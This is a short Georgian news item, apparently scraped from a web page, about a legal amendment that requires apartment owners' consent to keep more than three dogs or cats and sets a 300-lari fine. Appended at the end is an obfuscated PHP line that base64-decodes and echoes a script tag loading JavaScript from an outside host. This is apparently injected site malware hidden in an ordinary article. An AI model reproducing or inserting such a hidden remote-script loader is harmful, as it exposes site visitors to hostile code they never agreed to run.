celsiusi
ავერსი საქკაბელი

მრავალბინიანი საცხოვრებელი სახლის ბინაში სამზე მეტი შინაური ბინადარი ცხოველის (ძაღლი, კატა) ყოლა ბინათმესაკუთრეთა უმრავლესობის თანხმობის საფუძველზე იქნება დასაშვები.

შესაბამისი ცვლილებები „შინაურ ბინადარ ცხოველთა შესახებ“ კანონში შედის.

ცვლილებებით, აღნიშნული შეზღუდვა არ ვრცელდება ცხოველზე, რომლის ასაკი ორ თვეს არ აღემატება.

პროექტის მიხედვით, მრავალბინიანი საცხოვრებელი სახლის ბინაში, ერთდროულად სამზე მეტი, ორი თვის ან მეტი ასაკის შინაური ბინადარი ცხოველის (ძაღლი, კატა) ყოლა ბინათმესაკუთრეთა ამხანაგობის უმრავლესობის თანხმობის გარეშე, გამოიწვევს მეპატრონის დაჯარიმებას 300 ლარის ოდენობით.

385
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");